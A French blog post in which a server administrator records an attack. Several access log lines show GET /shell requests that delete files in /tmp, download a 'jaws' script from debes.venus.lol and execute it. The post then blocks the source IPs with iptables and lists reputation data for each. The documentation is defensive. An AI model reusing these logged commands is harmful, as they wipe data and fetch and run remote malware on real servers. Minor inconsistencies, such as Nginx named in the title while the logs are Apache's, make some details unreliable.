CyberNeurones !

Sports, Informations locales, Open Source, Consom'acteur, Trekking.

Nouvelle attaque sur Ngnix : debes.venus.lol

Publié le 20/01/2021 par Frederic

Voici les logs :

# grep "GET /shell" /var/log/apache2/access.humhub.log
156.197.215.223 - - [21/Jan/2021:07:58:51 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ debes.venus.lol/jaws;sh+/tmp/jaws" 400 0 "-" "-"
178.129.246.3 - - [20/Jan/2021:03:00:09 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ debes.venus.lol/jaws;sh+/tmp/jaws" 400 0 "-" "-"
46.209.56.107 - - [20/Jan/2021:16:43:59 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ debes.venus.lol/jaws;sh+/tmp/jaws" 400 0 "-" "-"
156.216.50.199 - - [20/Jan/2021:18:35:35 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ debes.venus.lol/jaws;sh+/tmp/jaws" 400 0 "-" "-"

Je vais donc bloquer les deux IP 178.129.246.3 & 46.209.56.107.

# iptables -A INPUT -s 178.129.246.3 -j DROP
# iptables -A INPUT -s 156.197.215.223 -j DROP
# iptables -A INPUT -s 46.209.56.107 -j DROP
# iptables -A INPUT -s 156.216.50.199 -j DROP
# iptables-save > /etc/iptables/rules.v4

Propriété de l’adresse IP 46.209.56.107

Localisation	Iran
Réputation	86 %
Anonymat	Aucun détection
Usage	Attribué
Source	RIPE NCC
Nom d’hote	46.209.56.107

Propriété de l’adresse IP 178.129.246.3

Localisation	Russie
Réputation	29 %
Anonymat	Aucun détection
Usage	Attribué
Source	RIPE NCC
Nom d’hote	h178-129-246-3.dyn.bashtel.ru

Propriété de l’adresse IP 156.197.215.223

Localisation	Égypte
Réputation	71 %
Anonymat	Aucun détection
Usage	Attribué
Source	AfriNIC
Nom d’hote	host-156.197.223.215-static.tedata.net

Propriété de l’adresse IP 156.216.50.199

Localisation	Égypte
Réputation	71 %
Anonymat	Aucun détection
Usage	Attribué
Source	AfriNIC
Nom d’hote	host-156.216.199.50-static.tedata.net

Une réflexion sur « Nouvelle attaque sur Ngnix : debes.venus.lol »

Le 21/01/2021 à 08:22, Stefan a dit :

using fail2ban you can automate blocking requests

Répondre ↓

Laisser un commentaire Annuler la réponse